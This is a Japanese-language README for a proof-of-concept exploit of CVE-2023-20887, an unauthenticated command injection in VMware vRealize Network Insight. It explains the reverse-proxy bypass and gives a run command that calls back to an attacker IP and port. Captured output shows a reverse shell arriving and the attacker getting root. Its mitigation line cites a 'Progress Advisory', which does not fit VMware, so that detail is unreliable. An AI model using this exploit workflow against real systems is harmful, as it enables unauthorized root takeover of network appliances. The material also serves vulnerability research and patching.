
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) の認証不要RCEに関するPOC
脆弱性の根本原因分析は私のブログでご覧いただけます: https://kushagraojha.medium.com/vmware-vrealize-network-insight-cve-2023-20887-193f3c3d30a0
VMWare Aria Operations for Networks (vRealize Network Insight) は、Apache Thrift RPC インターフェースを介してユーザー入力を受け入れる際にコマンドインジェクションに対して脆弱です。この脆弱性により、リモートの認証されていない攻撃者が、基盤となるオペレーティングシステム上で root ユーザーとして任意のコマンドを実行できる可能性があります。RPC インターフェースはリバースプロキシによって保護されていますが、これを迂回することが可能です。VMware はこの問題の深刻度を Critical(重要)と評価し、最大 CVSSv3 基本スコアは 9.8 です。悪意のある攻撃者は、アプライアンス上で 'root' コンテキストでのリモートコード実行を達成できます。VMWare 6.x バージョンが脆弱です。
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
最新バージョンにアップデートするか、Progress Advisory の指示に従って緩和策を実施してください。
このソフトウェアは、純粋に学術研究と効果的な防御技術の開発を目的として作成されたものであり、明示的に許可された場合を除き、システムへの攻撃に使用することを意図していません。プロジェクトメンテナーは、ソフトウェアの誤用に対して一切の責任を負いません。責任を持って使用してください。